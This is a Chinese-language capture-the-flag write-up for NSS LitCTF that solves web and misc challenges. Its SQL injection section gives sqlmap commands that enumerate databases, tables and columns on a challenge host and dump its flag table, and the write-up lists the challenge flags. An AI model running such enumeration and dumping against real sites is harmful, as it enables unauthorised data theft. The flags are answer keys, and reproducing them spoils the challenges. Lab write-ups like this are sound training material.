NSS LitCTF部分wp

web

1、PHP是世界上最好的语言！！

直接cat flag

 flag=NSSCTF{11eaebe0-3764-410d-be83-b23532a24235}

2、这是什么？SQL ！注一下 ！

 直接查询，发现注入点是id

 

 使用sqlmap列出所以数据库

​sqlmap -u "http://node1.anna.nssctf.cn:28755//?id=1" --dbs 

 available databases [6]:
[*] ctf
[*] ctftraining
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

列出指定数据库的表

第一个里面没什么发现，在第二个库里面看到flag字样

​sqlmap -u "http://node1.anna.nssctf.cn:28755/?id=1" -D ctftraining --tables 

继续列出指定表的字段

​sqlmap -u "http://node1.anna.nssctf.cn:28755/?id=1"  -D ctftraining -T flag --columns 

获取指定字段中的数据

​sqlmap -u "http://node1.anna.nssctf.cn:28755/?id=1"  -D ctftraining -T flag -C flag --dump

 NSSCTF{759de34b-d02a-4781-a33c-113aba994a10}

 Misc

1、Take me hand

使用010editor打开搜寻关键字flag 

放入随波逐流解码

 NSSCTF{Give_y0ur_hand_to_me!!!_plz}

2、喜欢我的压缩包么

打开附件发现加密了

尝试恢复密码

 打开即可看到

NSSCTF{Do-u-like-my-zip-p4ck?} 

3、破损的图片

使用010editor打开发现文件头缺失，根据题目提示是破损的图片，且没有出现高亮，应该是png

 直接补上pn头，另存为后打开

 

 NSSCTF{May you, the beauty of this world, always shine.}

4、这羽毛球怎么只有一半啊

打开附件，很明显感觉图片高度不够

 将高度改高

另存为 打开看到flag

 NSSCTF{Fl4g_0fcourse!}

其他的后面会继续更新！